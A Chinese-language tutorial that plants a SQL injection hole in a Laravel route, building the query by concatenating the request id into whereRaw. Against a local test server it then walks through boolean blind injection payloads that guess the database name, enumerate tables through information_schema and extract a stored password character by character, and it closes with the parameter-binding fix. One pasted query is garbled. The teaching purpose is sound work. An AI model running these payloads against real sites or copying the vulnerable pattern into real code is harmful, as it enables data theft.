這篇文章為大家帶來了關於laravel的相關知識,其中主要介紹了怎樣通過造一個laravel漏洞來講解sql盲注原理,所謂的盲注就是在服務器沒有錯誤回顯的時候完成的注入攻擊,下面一起來看一下,希望對大家有幫助。
【相關推薦:laravel影片教學】
環境
composer create-project laravel/laravel lar9 // 安装laravel9 // 编辑.env 修改为DEBUG=false 配置数据库 DEBUG=false DB_HOST=.... php artisan migrate php artisan serve // 启动 // 插入数据 insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');
建立漏洞
// routes/web.php Route::get('/', function () { $id = request()->id; $user = \App\Models\User::whereRaw('id = '.$id)->first(); return $user->name ?? ''; }); // 最后转换的sql是: select * from users where id = $id
測試
http://127.0.0.1:8000/?id=1' // 500 http://127.0.0.1:8000/?id=1 and 1=2 // select * from users where id = 1 and 1=2; 返回空 http://127.0.0.1:8000/?id=1 and 1=1 // select * from users where id = 1 and 1=1 返回xxh
資料庫名稱
猜出資料名長度
url: http://127.0.0.1:8000/?id=1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 2 // 一直循环下去
猜出資料庫名稱
从第一步 知道了数据库名长度 `select * from users where id = 1 and substr(database(),1,1) =a` `select * from users where id = 1 and substr(database(),1,1) =b` // 一直循环下去 找到数据库名的第一个做字符 然后找第二个字符 直到找完数据库名的长度
最終: laravel_project
表名
##以下的步驟和猜資料庫差不多,就簡說了。information_schema
information_schema 是mysql 附帶的,資料庫名表名列類型等都有記錄,猜表字段明需要從這個資料庫來。猜laravel_project 的表格數量
url: http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5 mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct"; +----------+ | count(*) | +----------+ | 5 | +----------+
猜第一個表名的長度
與[猜出資料名長度] 此不多。猜第一個表名
url: http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f' mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1; +------------------------+ | substr(table_name,1,1) | +------------------------+ | f | +------------------------+ // 得出第一个表的第一个字段是f 然后查第最後得到第一個表格名稱為: failed_jobs
猜欄位
和猜表一模一樣的邏輯。select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; // fail_jobs字段总数
猜資料
資料這才是最重要的。 因為 failed_jobs 沒數據,所以我換成 users 來。 users 有個 password 欄位。mysql> select substr((select password from users limit 0,1),1,1); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,1) | +----------------------------------------------------+ | w | +----------------------------------------------------+ 得出第一个是w,存起来,最后判断 mysql> select substr((select password from users limit 0,1),1,2); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,2) | +----------------------------------------------------+ | wo | +----------------------------------------------------+ 第二个值为o 用第一个值 + 第二个值作为盲注……
防禦
(有時候where 不滿足需求,就需要whereRaw)如果需要,記得綁定就好。Route::get('/', function () { $id = request()->id; $user = \App\Models\User::whereRaw('id = ?',[$id])->first(); return $user->name ?? ''; });只要安份的用框架,不會會漏洞的。 那些老項目,漏洞滿地飛。 現在這個時代,找漏洞難登天。
Ps
上面為了解釋簡單,用是最簡單的查找。 手工盲注應該用二分來找出。select * from users where id = 1 and substr(database(),1,1) ='a'; 换成二分: select * from users where id = 1 and ascii(substr(database(),1,1)) > 99;最好還是直接借助工具 sqlmap, 直接掃出來。 【相關推薦:
laravel影片教學】
以上是透過laravel漏洞實例解析sql盲注原理的詳細內容。更多資訊請關注PHP中文網其他相關文章!